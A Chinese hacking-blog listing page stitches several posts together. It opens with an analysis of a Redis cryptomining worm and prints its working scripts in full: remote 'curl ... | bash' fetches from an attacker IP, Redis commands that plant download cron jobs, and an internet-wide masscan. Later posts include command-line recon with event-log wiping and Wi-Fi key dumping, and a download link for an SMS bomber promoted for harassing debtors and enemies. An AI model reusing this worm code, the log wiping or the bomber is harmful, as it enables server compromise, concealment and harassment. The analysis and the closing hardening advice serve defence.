/usr/bin/gpg-agentd sleep 1 if ! [ -x "$(command -v masscan)" ]; then rm -rf /var/lib/apt/lists/* rm -rf x1.tar.gz if [ -x "$(command -v apt-get)" ]; then export DEBIAN_FRONTEND=noninteractive apt-get update -y apt-get install -y debconf-doc apt-get install -y build-essential apt-get install -y libpcap0.8-dev libpcap0.8 apt-get install -y libpcap* apt-get install -y make gcc git apt-get install -y redis-server apt-get install -y redis-tools apt-get install -y redis apt-get install -y iptables apt-get install -y wget curl fi if [ -x "$(command -v yum)" ]; then yum update -y yum install -y epel-release yum update -y yum install -y git iptables make gcc redis libpcap libpcap-devel yum install -y wget curl fi sleep 1 curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz sleep 1 [ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4 fi sleep 3 && rm -rf .watch bash -c 'curl -fsSL 159.89.190.243/rsh.php|bash' 2>/dev/null 这段脚本的代码比较长,但主要的功能有4个: 1,下载远程代码到本地,添加执行权限,chmod u+x。 2,修改rc.local,让本地代码开机自动执行。 3,下载github上的开源扫描器代码,并安装相关的依赖软件,也就是我上面的messages里看到的记录。 4,下载第三个脚本,并且执行。   我去github上看了下这个开源代码,简直吊炸天。 MASSCAN: Mass IP port scanner This is the fastest Internet port scanner. It can scan the entire Internet in under 6 minutes, > transmitting 10 million packets per second. It produces results similar to nmap, the most famous port scanner. Internally, it operates more > like scanrand, unicornscan, and ZMap, using asynchronous transmission. The major difference is > that it's faster than these other scanners. In addition, it's more flexible, allowing arbitrary > address ranges and port ranges. NOTE: masscan uses a custom TCP/IP stack. Anything other than simple port scans will cause  conflict with the local TCP/IP stack. This means you need to either use the -S option to use a separate IP address, or configure your operating system to firewall the ports that masscan uses.   transmitting 10 million packets per second(每秒发送1000万个数据包),比nmap速度还要快,这就不难理解为什么阿里云把服务器冻结了,大概看了下readme之后,我也没有细究,继续下载第三个脚本。 setenforce 0 2>/dev/null ulimit -n 50000 ulimit -u 50000 sleep 1 iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null sleep 1 rm -rf .dat .shard .ranges .lan 2>/dev/null sleep 1 echo 'config set dbfilename "backup.db"' > .dat echo 'save' >> .dat echo 'flushall' >> .dat echo 'set backup1 "\n\n\n*/2 * * * * curl -fsSL http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'set backup4 "\n\n\n*/5 * * * * wget -q -O- http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'config set dir "/var/spool/cron/"' >> .dat echo 'config set dbfilename "root"' >> .dat echo 'save' >> .dat echo 'config set dir "/var/spool/cron/crontabs"' >> .dat echo 'save' >> .dat sleep 1 masscan --max-rate 10000 -p6379,6380 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .shard sleep 1 masscan --max-rate 10000 -p6379,6380 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .ranges sleep 1 ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet sleep 1 masscan --max-rate 10000 -p6379,6380 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .lan sleep 60 rm -rf .dat .shard .ranges .lan 2>/dev/null 如果说前两个脚本只是在服务器上下载执行了二进制文件,那这个脚本才真正显示病毒的威力。下面就来分析这个脚本。 一开始的修改系统环境没什么好说的,接下来的写文件操作有点眼熟,如果用过redis的人,应该能猜到,这里是对redis进行配置。写这个配置,自然也就是利用了redis把缓存内容写入本地文件的漏洞,结果就是用本地的私钥去登陆被写入公钥的服务器了,无需密码就可以登陆,也就是我们文章最开始的/root/.ssh/authorized_keys。登录之后就开始定期执行计划任务,下载脚本。好了,配置文件准备好了,就开始利用masscan进行全网扫描redis服务器,寻找肉鸡,注意看这6379就是redis服务器的默认端口,如果你的redis的监听端口是公网IP或是0.0.0.0,并且没有密码保护,不好意思,你就中招了。 0x03 总结 通过依次分析这3个脚本,就能看出这个病毒的可怕之处,先是通过写入ssh public key 拿到登录权限,然后下载执行远程二进制文件,最后再通过redis漏洞复制,迅速在全网传播,以指数级速度增长。那么问题是,这台服务器是怎么中招的呢?看了下redis.conf,bind的地址是127.0.0.1,没啥问题。由此可以推断,应该是root帐号被暴力破解了,为了验证我的想法,我lastb看了一下,果然有大量的记录: 还剩最后一个问题,这个gpg-agentd程序到底是干什么的呢?我当时的第一个反应就是矿机,因为现在数字货币太火了,加大了分布式矿机的需求,也就催生了这条灰色产业链。于是,顺手把这个gpg-agentd拖到ida中,用string搜索bitcoin, eth, mine等相关单词,最终发现了这个:   打开nicehash.com看一下,一切都清晰了。 0x04 安全建议 一、服务器 1,禁用ROOT 2,用户名和密码尽量复杂 3,修改ssh的默认22端口 4,安装DenyHosts防暴力破解软件 5,禁用密码登录,使用RSA公钥登录 二、redis 1,禁用公网IP监听,包括0.0.0.0 2,使用密码限制访问redis 3,使用较低权限帐号运行redis   到此,整个入侵过程基本分析完了,如果大家对样本有兴趣,也可以自行去curl,或是去虚拟机执行上面的脚本。鉴于本人能力有限,文中难免会出现疏忽或是错误,还请大家多多指正。 ...

    2020-04-13 659
  • 不懂代码也能爬取数据?试试这几个工具

    前天,有个同学加我微信来咨询我: “毒蜂,我想抓取近期 5000 条新闻数据,但我是文科生,不会写代码,请问该怎么办?” 有问必答,毒蜂对于这位同学的问题,我给安排上。 先说说获取数据的方式:一是利用现成的工具,我们只需懂得如何使用工具就能获取数据,不需要关心工具是怎么实现。打个比方,假如我们在岸上,要去海上某个小岛,岸边有一艘船,我们第一想法是选择坐船过去,而不会想着自己来造一艘船再过去。 第二种是自己针对场景需求做些定制化工具,这就需要有点编程基础。举个例子,我们还是要到海上某个小岛,同时还要求在 30 分钟内将 1 顿货物送到岛上。 因此,前期只是单纯想获取数据,没有什么其他要求的话,优先选择现有工具。 可能是 Python 近来年很火,加上我们会经常看到别人用 Python 来制作网络爬虫抓取数据。从而有一些同学有这样的误区,想从网络上抓取数据就一定要学 Python,一定要去写代码。 其实不然,毒蜂介绍几个能快速获取网上数据的工具。 1.Microsoft Excel 你没有看错,就是 Office 三剑客之一的 Excel。Excel 是一个强大的工具,能抓取数据就是它的功能之一。我以耳机作为关键字,抓取京东的商品列表。 等待几秒后,Excel 会将页面上所有的文字信息抓取到表格中。这种方式确实能抓取到数据,但也会引入一些我们不需要的数据。如果你有更高的需求,可以选择后面几个工具。 2.火车头采集器 火车头是爬虫界的老品牌了,是目前使用人数最多的互联网数据抓取、处理、分析,挖掘软件。它的优势是采集不限网页,不限内容,同时还是分布式采集,效率会高一些。缺点是对小白用户不是很友好,有一定的知识门槛(了解如网页知识、HTTP 协议等方面知识),还需要花些时间熟悉工具操作。 因为有学习门槛,掌握该工具之后,采集数据上限会很高。有时间和精力的同学可以去折腾折腾。 官网地址:http://www.locoy.com/ 3.八爪鱼采集器 八爪鱼采集器是一款非常适合新手的采集器。它具有简单易用的特点,让你能几分钟中就快手上手。八爪鱼提供一些常见抓取网站的模板,使用模板就能快速抓取数据。如果想抓取没有模板的网站,官网也提供非常详细的图文教程和视频教程。 八爪鱼是基于浏览器内核实现可视化抓取数据,所以存在卡顿、采集数据慢的特点。但这瑕不掩瑜,能基本满足新手在短时间抓取数据的场景,比如翻页查询,Ajax 动态加载数据等。 网站:https://www.bazhuayu.com/ 4.GooSeeker 集搜客 集搜客也是一款容易上手的可视化采集数据工具。同样能抓取动态网页,也支持可以抓取手机网站上的数据,还支持抓取在指数图表上悬浮显示的数据。集搜客是以浏览器插件形式抓取数据。虽然具有前面所述的有点,但缺点也有,无法多线程采集数据,出现浏览器卡顿也在所难免。 网站:https://www.gooseeker.com/ 5.Scrapinghub 如果你想抓取国外的网站数据,可以考虑 Scrapinghub。Scrapinghub 是一个基于Python 的 Scrapy 框架的云爬虫平台。Scrapehub 算是市场上非常复杂和强大的网络抓取平台,提供数据抓取的解决方案商。 地址:https://scrapinghub.com/ 6.WebScraper WebScraper 是一款优秀国外的浏览器插件。同样也是一款适合新手抓取数据的可视化工具。我们通过简单设置一些抓取规则,剩下的就交给浏览器去工作。 地址:https://webscraper.io/ 如果你觉得文章不错的话,分享、收藏、在看是对猴哥的最大支持,是毒蜂持续创作的动力。 ...

    2020-04-12 922
  • Windows主机漏洞扫描工具

    0×00 说明: 这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免database is locked的错误,采用md5哈希算法确保数据不重复插入。 本工具查找是否有公开exp的网站为shodan,该网站限制网络发包的速度,因而采用了单线程的方式,且耗时较长。 功能: 查找主机上具有的CVE 查找具有公开EXP的CVE 0×01 起因: 因为需要做一些主机漏洞扫描方面的工作,因而编写了这个简单的工具。之前也查找了几款类似的工具,如下: vulmap: vulmon开发的一款开源工具,原理是根据软件的名称和版本号来确定,是否有CVE及公开的EXP。这款Linux的工具挺好用,但是对于Windows系统层面不太适用。 windows-exp-suggester: 这款和本工具的原理一样,尝试使用了之后,发现它的CVEKB数据库只更新到2017年的,并且没有给出CVE是否有公开的EXP信息。 基于以上所以写了这个简单的工具,该项目在https://github.com/chroblert/WindowsVulnScan 0×02 原理: 1. 搜集CVE与KB的对应关系。首先在微软官网上收集CVE与KB对应的关系,然后存储进数据库中 2. 查找特定CVE网上是否有公开的EXP 3. 利用powershell脚本收集主机的一些系统版本与KB信息 4. 利用系统版本与KB信息搜寻主机上具有存在公开EXP的CVE 0×03 参数:  # author: JC0o0l  # GitHub: https://github.com/chroblert/  可选参数:    -h, --help           show this help message and exit    -u, --update-cve     更新CVEKB数据    -U, --update-exp     更新CVEEXP数据    -C, --check-EXP       检索具有EXP的CVE    -f FILE, --file FILE ps1脚本运行后产生的.json文件 0×04 示例: 1. 首先运行powershell脚本KBCollect.ps收集一些信息  .\KBCollect.ps1 2. 将运行后产生的KB.json文件移动到cve-check.py所在的目录 3. 安装一些python3模块  python3 -m pip install requirements.txt 4. 运行cve-check.py -u创建CVEKB数据库 5. 运行cve-check.py -U更新CVEKB数据库中的hasPOC字段 6. 运行cve-check.py -C -f KB.json查看具有公开EXP的CVE,如下: 0×05 源码: KBCollect.ps1:  function Get-CollectKB(){      # 1. 搜集所有的KB补丁      $KBArray = @()      $KBArray = Get-HotFix|ForEach-Object {$_.HotFixId}      $test = $KBArray|ConvertTo-Json      return $test  }  function Get-BasicInfo(){      # 1. 操作系统      # $windowsProductName = (Get-ComputerInfo).WindowsProductName      $windowsProductName = (Get-CimInstance Win32_OperatingSystem).Caption      # 2. 操作系统版本      $windowsVersion = (Get-ComputerInfo).WindowsVersion      $basicInfo = "{""windowsProductName"":""$windowsProductName"",""windowsVersion"":""$windowsVersion""}"      return $basicInfo        }  $basicInfo = Get-BasicInfo  $KBList = Get-CollectKB  $KBResult = "{""basicInfo"":$basicInfo,""KBList"":$KBList}"  $KBResult|Out-File KB.json -encoding utf8 cve-check.py:  import requests  import sqlite3  import json  import hashlib  import math  import re  import threading  import time  import argparse  from pathlib import Path  # 删除一些ssl 认证的warnging信息  requests.packages.urllib3.disable_warnings()    ThreadCount=20  DBFileName="CVEKB.db"  TableName="CVEKB"  insertSQL = []  updateSQL = []  lock = threading.Lock()  KBResult = {}  parser = argparse.ArgumentParser()  parser.add_argument("-u","--update-cve",help="更新CVEKB数据",action="store_true")  parser.add_argument("-U","--update-exp",help="更新CVEEXP数据",action="store_true")  parser.add_argument("-C","--check-EXP",help="检索具有EXP的CVE",action="store_true")  parser.add_argument("-f","--file",help="ps1脚本运行后产生的.json文件")  args = parser.parse_args()    class CVEScanThread(threading.Thread):      def __init__(self,func,args,name="",):          threading.Thread.__init__(self)          self.func = func          self.args = args          self.name = name          self.result = None        def run(self):          print("thread:{} :start scan page {}".format(self.args[1],self.args[0]))          self.result = self.func(self.args[0],)          print("thread:{} :stop scan page {}".format(self.args[1],self.args[0]))  class EXPScanThread(threading.Thread):      def __init__(self,func,args,name="",):          threading.Thread.__init__(self)          self.func = func          self.args = args          self.name = name          self.result = None        def run(self):          print("thread:{} :start scan CVE: {},xuehao:{}".format(self.args[1],self.args[0],self.args[2]))          self.result = self.func(self.args[0],)          print("thread:{} :stop scan CVE: {}".format(self.args[1],self.args[0]))      def get_result(self):          threading.Thread.join(self)          try:              return self.result          except Exception:              return "Error"  def get_page_num(num=1,pageSize=100):      url = "https://portal.msrc.microsoft.com/api/security-guidance/en-us"      payload = "{\"familyIds\":[],\"productIds\":[],\"severityIds\":[],\"impactIds\":[],\"pageNumber\":" + str(num) + ",\"pageSize\":" + str(pageSize) + ",\"includeCveNumber\":true,\"includeSeverity\":false,\"includeImpact\":false,\"orderBy\":\"publishedDate\",\"orderByMonthly\":\"releaseDate\",\"isDescending\":true,\"isDescendingMonthly\":true,\"queryText\":\"\",\"isSearch\":false,\"filterText\":\"\",\"fromPublishedDate\":\"01/01/1998\",\"toPublishedDate\":\"03/02/2020\"}"      headers = {          'origin': "https//portal.msrc.microsoft.com",          'referer': "https//portal.msrc.microsoft.com/en-us/security-guidance",          'accept-language': "zh-CN",          'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299",          'accept': "application/json, text/plain, */*",          'accept-encoding': "gzip, deflate",          'host': "portal.msrc.microsoft.com",          'connection': "close",          'cache-control': "no-cache",          'content-type': "application/json",         }        response = requests.request("POST", url, data=payload, headers=headers, verify = False)      resultCount = json.loads(response.text)['count']      return math.ceil(int(resultCount)/100)    def update_cvekb_database(num=1,pageSize=100):      pageCount = get_page_num()      #for i in range(1,pageCount+1):      i = 1      pageCount=524      tmpCount = ThreadCount      while i <= pageCount:          tmpCount = ThreadCount if (pageCount - i) >= ThreadCount else pageCount - i          print("i:{},pageCount-i:{},ThreadCount:{},PageCount:{}".format(i,pageCount-i,ThreadCount,pageCount))          time.sleep(0.5)              threads = []          print("===============================")          for j in range(1,tmpCount + 1):              print("更新第{}页".format(i+j-1))              t = CVEScanThread(update_onepage_cvedb_database,(i+j-1,j,),str(j))              threads.append(t)          for t in threads:              t.start()          for t in threads:              t.join()              # update_onepage_cvedb_database(num=i)          i = i + tmpCount          conn = sqlite3.connect(DBFileName)          for sql in insertSQL:              conn.execute(sql)          conn.commit()          conn.close()          if tmpCount != ThreadCount:              break                      def check_POC_every_CVE(CVEName=""):      #apiKey = ""      #url = "https://exploits.shodan.io/api/search?query=" + CVEName + "&key=" + apiKey      url = "https://exploits.shodan.io/?q=" + CVEName      try:          response = requests.request("GET",url=url,verify=False,timeout=10)          #total = json.loads(response.text)      except Exception as e:          print("Error,{}".format(CVEName))          print(e)          return "Error"      if "Total Results" not in response.text:          return "False"      else:          return "True"  def update_onepage_cvedb_database(num=1,pageSize=100):      url = "https://portal.msrc.microsoft.com/api/security-guidance/en-us"        payload = "{\"familyIds\":[],\"productIds\":[],\"severityIds\":[],\"impactIds\":[],\"pageNumber\":" + str(num) + ",\"pageSize\":" + str(pageSize) + ",\"includeCveNumber\":true,\"includeSeverity\":false,\"includeImpact\":false,\"orderBy\":\"publishedDate\",\"orderByMonthly\":\"releaseDate\",\"isDescending\":true,\"isDescendingMonthly\":true,\"queryText\":\"\",\"isSearch\":false,\"filterText\":\"\",\"fromPublishedDate\":\"01/01/1998\",\"toPublishedDate\":\"03/02/2020\"}"      headers = {          'origin': "https//portal.msrc.microsoft.com",          'referer': "https//portal.msrc.microsoft.com/en-us/security-guidance",          'accept-language': "zh-CN",          'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299",          'accept': "application/json, text/plain, */*",          'accept-encoding': "gzip, deflate",          'host': "portal.msrc.microsoft.com",          'connection': "close",          'cache-control': "no-cache",          'content-type': "application/json",         }      try:          response = requests.request("POST", url, data=payload, headers=headers, verify = False)          resultList = json.loads(response.text)['details']      except :          print(response.text)      conn = sqlite3.connect(DBFileName)      create_sql = """Create Table IF NOT EXISTS {} (         hash TEXT UNIQUE,         name TEXT,         KBName TEXT,         CVEName TEXT,         impact TEXT,         hasPOC TEXT)""".format(TableName)      conn.execute(create_sql)      conn.commit()      conn.close()      for result in resultList:          KBName = result['articleTitle1'] + ";" if (result['articleTitle1'] !=  None) and result['articleTitle1'].isdigit() else ""          KBName += result['articleTitle2'] + ";" if (result['articleTitle2'] != None) and result['articleTitle2'].isdigit() else ""          KBName += result['articleTitle3'] + ";" if (result['articleTitle3'] != None) and result['articleTitle3'].isdigit() else ""          KBName += result['articleTitle4'] + ";" if (result['articleTitle4'] != None) and result['articleTitle4'].isdigit() else ""          if KBName == "":              continue          h1 = hashlib.md5()          metaStr = result['name'] + KBName + result['cveNumber'] + result['impact']          h1.update(metaStr.encode('utf-8'))          #hasPOC = check_POC_every_CVE(result['cveNumber'])          # 收集到所有的KB后再搜索有没有公开的EXP          hasPOC = ""          sql = "INSERT OR IGNORE INTO "+TableName+" VALUES ('" + h1.hexdigest() + "','" + result['name'] + "','" + KBName + "','" + result['cveNumber'] + "','" + result['impact'] + "','" + hasPOC+"')"          with lock:              global insertSQL              insertSQL.append(sql)          # conn.execute(sql)      # conn.commit()      # conn.close()      # pass    def select_CVE(tmpList=[],windowsProductName="",windowsVersion=""):      conn = sqlite3.connect(DBFileName)      con = conn.cursor()      intersectionList = []      count = 0      for i in tmpList:          sql = 'select distinct(CVEName) from '+ TableName+' where (name like "'+ windowsProductName+'%'+ windowsVersion + '%") and ("'+ i +'" not in (select KBName from '+ TableName +' where name like "'+ windowsProductName+'%'+windowsVersion+'%")); '          cveList = []          for cve in con.execute(sql):              cveList.append(cve[0])          if count == 0:              intersectionList = cveList.copy()          count +=1          intersectionList = list(set(intersectionList).intersection(set(cveList)))      intersectionList.sort()      for cve in intersectionList:          sql = "select CVEName from {} where CVEName == '{}' and hasPOC == 'True'".format(TableName,cve)          # print(sql)          con.execute(sql)          if len(con.fetchall()) != 0:              print("{} has EXP".format(cve))      # print(intersectionList)  def update_hasPOC(key = "Empty"):      conn = sqlite3.connect(DBFileName)      con = conn.cursor()      if key == "All":          sql = "select distinct(CVEName) from {}".format(TableName)      else:          sql = "select distinct(CVEName) from {} where (hasPOC IS NULL) OR (hasPOC == '')".format(TableName)        con.execute(sql)      cveNameList = con.fetchall()      i = 0      count = 1      while i < len(cveNameList):          print("|=========={}============|".format(i))          # tmpCount = ThreadCount if (len(cveNameList) - i) >= ThreadCount else len(cveNameList) - i          # threads = []          # for j in range(1,tmpCount+1):          #     t = EXPScanThread(check_POC_every_CVE,(cveNameList[i+j][0],j,i+j,),str(j))          #     threads.append(t)          # for t in threads:          #     t.start()          # for t in threads:          #     t.join()          # j = 1          # for t in threads:          #     hasPOC = t.get_result()          #     print(hasPOC)          #     update_sql = "UPDATE "+TableName+" set hasPOC = '" + hasPOC + "' WHERE cveName == '" + cveNameList[i+j][0] +"';"          #     conn.execute(update_sql)          #     print("[+] update:{}".format(update_sql))          #     j += 1          # i=i+ThreadCount          # conn.commit()          hasPOC = check_POC_every_CVE(cveNameList[i][0])          time.sleep(0.3)          update_sql = "UPDATE "+TableName+" set hasPOC = '" + hasPOC + "' WHERE cveName == '" + cveNameList[i][0] +"';"          conn.execute(update_sql)          print(update_sql)          count += 1          i += 1          if count == 10:              conn.commit()              print("[+]update")              count = 1      conn.commit()      conn.close()      print("Over")      if __name__ == "__main__":      banner = """     ========CVE-EXP-Check===============     |       author:JC0o0l               |     |       wechat:JC_SecNotes         |     |       version:1.0                 |     =====================================     """      print(banner)      if (not args.check_EXP ) and (not args.update_cve) and (not args.update_exp) and args.file is None:          parser.print_help()      if args.update_cve:          update_cvekb_database()      if args.update_exp:          dbfile=Path(DBFileName)          if dbfile.exists():              update_hasPOC(key="Empty")          else:              print("请先使用-u 创建数据库")              parser.print_help()      if args.check_EXP:          dbfile=Path(DBFileName)          if not dbfile.exists():              print("请先使用-u 创建数据库,之后使用 -U 更新是否有EXP")              parser.print_help()              exit()          if args.file:              with open(args.file,"r",encoding="utf-8") as f:                  KBResult = json.load(f)              windowsProductName = KBResult['basicInfo']['windowsProductName']              windowsProductName = ((re.search("\w[\w|\s]+\d+[\s|$]",windowsProductName).group()).strip()).replace("Microsoft","").strip()              windowsVersion = KBResult['basicInfo']['windowsVersion']              print("系统信息如下:")              print("{} {}".format(windowsProductName,windowsVersion))              tmpKBList = KBResult['KBList']              KBList = []              for KB in tmpKBList:                  KBList.append(KB.replace("KB",""))              print("KB信息如下:")              print(KBList)              print("EXP信息如下:")              select_CVE(tmpList=KBList,windowsProductName=windowsProductName,windowsVersion=windowsVersion)          else:              print("请输入.json文件")  ...

    2020-04-12 816
  • 命令行下的信息搜集

    使用wmic识别安装到系统中的补丁情况 C:\> wmic qfe get description,installedOn 识别正在运行的服务 C:\>sc query type= service C:\>net start 识别开机启动的程序,包括路径 C:\>wmic startup list full ping探测存活主机 D:\>for /L %I in (100,1,254) DO @ping -w 1 -n 1 10.18.180.%I | findstr "TTL=" >> pinglive.txt 查看系统中网卡的IP地址和MAC地址 D:\>wmic nicconfig get ipaddress,macaddress 查看当前系统是否有屏保保护,延迟是多少 D:\>wmic desktop get screensaversecure,screensavertimeout 查看系统中开放的共享 D:\>wmic share get name,path D:\>net share 查看系统中开启的日志 C:\>wmic nteventlog get path,filename,writeable 清除相关的日志(这里是全部清除) wevtutil cl "windows powershell" wevtutil cl "security" wevtutil cl "system" 查看系统中安装的软件以及版本 C:\>wmic product get name,version 查看某个进程的详细信息 (路径,命令行参数等) C:\>wmic process where name="chrome.exe" list full 终止一个进程 D:\>wmic process where name="xshell.exe" call terminate D:\>ntsd -c q -p 进程的PID 显示系统中的曾经连接过的无线密码 D:\>netsh wlan show profiles D:\>netsh wlan show profiles name="profiles的名字" key=clear 查看当前系统是否是VMWARE C:\>wmic bios list full | find /i "vmware" ...

    2020-04-12 807
  • 和平精英无限扔烟雾弹

    本方法可以无限丢雷燃烧瓶或烟雾,不过烟雾作用大一点在决赛圈! 教程地址:https://share.weiyun.com/5I652zt ...

    2020-04-12 915
  • 粉丝被杀猪盘骗了十五万

    本文讲诉粉丝被杀猪盘诈骗十五万的真实事件,本文所采用技术手段及描述无任何编造。谢谢。   事情发生在十多天前,公众号的粉丝找到我,说他被骗了,想找我帮忙,但我不得不说的是,我已经清楚的知道,我帮不了他,因为他提的要求一定是让我帮他把钱拿回来........   于是加了他的微信,想先看看到底是棋牌还是BC。          最后得知是棋牌APP 接着在网站首页下载了这个**屏蔽敏感词**APP,通过夜神模拟器进行安装。         用他的账号登录到**屏蔽敏感词**app以后,我看见了他的VIP5,我就知道粉丝被宰的不轻了。 截图部分金额兑换截图          最后经过了漫长的计算机基础操作后,第二天的晚上,终于拿到了后台权限,出于激动我赶忙拍照发给了他。                               在聊天的时候,我就发现这位兄弟其实已经猜出来有些鬼了,我不玩这些,不清楚,作为一个不抽烟的/不喝酒/不打牌的肥宅,我真的很难体会到**屏蔽敏感词**到底有啥意思,十赌九输,有钱做做正经生意他不好吗。                 最可怕的事情,就是他觉得这是个很多人玩的大平台,到了后台我一看,才发现,真正的注册用户,只有17个,其他的,全是机器人.........                  机器人携带金币,轮番上阵,用一句话形容就是,你以为人山人海的地方,到了以后,其实就你们自己。   至此这位兄弟问了我个比较鸡肋的问题,能把钱找回来么。。。。这个我在文章开头已经提过了不能                   因为我确实没办法帮他把钱追回,最近的工作就是做这些相关类型的,搭建**屏蔽敏感词**网站的管理员IP地址就在后台日志,我已经保存,如果后续能对接上,就给大家出一个结果。                  为了让大家知道,**屏蔽敏感词**是不可能赢的,我只能拿几个之前做过的案例来给大家做深刻说明。 案例一.   某杀猪棋牌**屏蔽敏感词**APP,对角色添加受控胜率设置,让你根本不可能输。                 案例二.   某杀猪 触发敏感词

    触发敏感词
    你访问的页面含有敏感内容,请自觉离开

    如果你是网站管理员,在网页地址后方加入?/done/可正常访问

    请迅速处理违规内容,如有问题请咨询空间商



    彩票**屏蔽敏感词**站点,可以任何修改中奖号码。                 你在看看他们怼着6头猪杀了多少钱。                  所以,不要**屏蔽敏感词**,更不要相信**屏蔽敏感词**有输有赢,因为网上**屏蔽敏感词**,根本不会让你有赢的机会,更加不会让你有机会赢,被人玩弄于鼓掌之中,才是**屏蔽敏感词**者最悲哀的事情,希望各位朋友引以为戒。             转发朋友圈警醒身边的你 如果大家发现了类似的杀猪盘,或者网上的各类骗局和平台,欢迎向我们后台留言举报。 ...

    2020-04-11 746
  • 渣男语录

    下载地址:http://t.cn/A6wwm4GE...

    2020-04-10 850
  • 短信轰炸机

    老板欠债不还?炸他! 仇人?炸他 总体来说还可以,一分钟八十多条。 下载地址:http://t.cn/A6whkBSI...

    2020-04-09 1024
  • 微信辅助赚钱接单10-100元一单超多,赶紧来接单吧!

    现在微信被封号的人很多,因为微信核查越来越严格了,动不动发个广告被人举报一下说不定就会被封号了。封号了就要找人解封,现实生活中找吧没有保障,所以,很多人都会找一些正规的微信辅助赚钱接单平台,有的人因为微信号比较重要,所以就会出高价找人解封,这也给了很多人想用微信赚钱的人机会,随便用自己的微信帮人解封一下就能赚到10-100元的收入,我相信谁都愿意去帮人解封吧,毕竟只是动动手指,一分钟的事。 注册地址:http://uee.me/dcVND 大家可以找人过扫码辅助,成功后送一瓶水 或一包纸巾,一天下来的收入稳赚三四百。 ...

    2020-04-06 3936
  • 缅怀逝者|致敬英雄

    今日清明,全国哀悼。 山河同悲,铭记历史! 哪有什么岁月静好, 不过是有人为我们负重前行。 疫情总会消散,万物终将向阳, 缅怀逝者,致敬英雄。 ...

    2020-04-04 635
  • 19岁的她,在暗网被当做性奴拍卖!

    两眼只能看到利益,神经被金钱冲昏的时候, 他已经没有任何人性和灵魂可言。 禽兽不如。 【黑市交易】 2016年,美联社4名女记者获得了普利策最高荣誉“公共服务”奖, 他们揭露了菲律宾渔奴现象。 在印度尼西亚一个几乎与世隔绝的小岛上,有这样一群人: 他们被囚禁在只能容纳一个人坐立,无法躺下的铁笼里, 每天只能吃很少一点米饭,渴了只能喝脏水凑合, 全年无休,稍有不满,就会遭受老板的毒打。 有的人被打成残疾,有的人难以忍受虐待,宁可被鲸鱼吃掉,也要跳海自杀。 没等到回家那一天,很多渔奴心已经死了。 “我想回家,我们每个人都想回家! 当我们被船主毒打的时候,我们什么也做不了。” “我们开始绝望,也许我们一辈子都会被困在岛上, 当我给同伴挖坟墓的时候,我就想, 也许我的终点只能是死在这里。” 其中最小的只有15岁。 Ping,越南人,15岁的时候认识了一个人, 这个人说可以为Ping找一份不错的工作。 结果她却被卖到了妓院。 同行的伙伴曾试图反抗,结果遭到毒打,直至她不再抵抗。 Ping在妓院待了将近一年时间, 但这段经历对她的伤害,却是一辈子的。 她现在经常会头疼,有时还会间歇性的失明。 菲律宾据估共有80万非法性工作者,其中有高达10万是未成年人。 但他们可以说不吗? 不管有多痛苦,生存面前, 他们没有选择的权利,更没有选择的资本。 04 地下人口交易,巨额资金流入 据2005年国际刑警组织报告,人口贩运现已成为, 仅次于毒品和武器走私的全球第三大地下贸易。 为什么人贩子这么猖狂? 为什么人口贩卖规模又如此巨大? 因为钱。 根据美国司法部的说法,暗网之一“阿尔法湾”卖家达到4万人,客户超过20万人, 自2014年投入运营以来,该网站交易额保守估计达10亿美元! 《资本论》中有这样一个观点: 当利润达到10%的时候,他们将蠢蠢欲动; 当利润达到50%的时候,他们将铤而走险; 当利润达到100%的时候,他们敢于践踏人间的一切法律; 当利润达到300%的时候,他们敢于冒绞刑的危险。 拐只是手段,卖才是目的。 QQ群号:979727860 点击链接加入群聊:...

    2020-03-29 2900
  • 暗网是一个怎样的世界

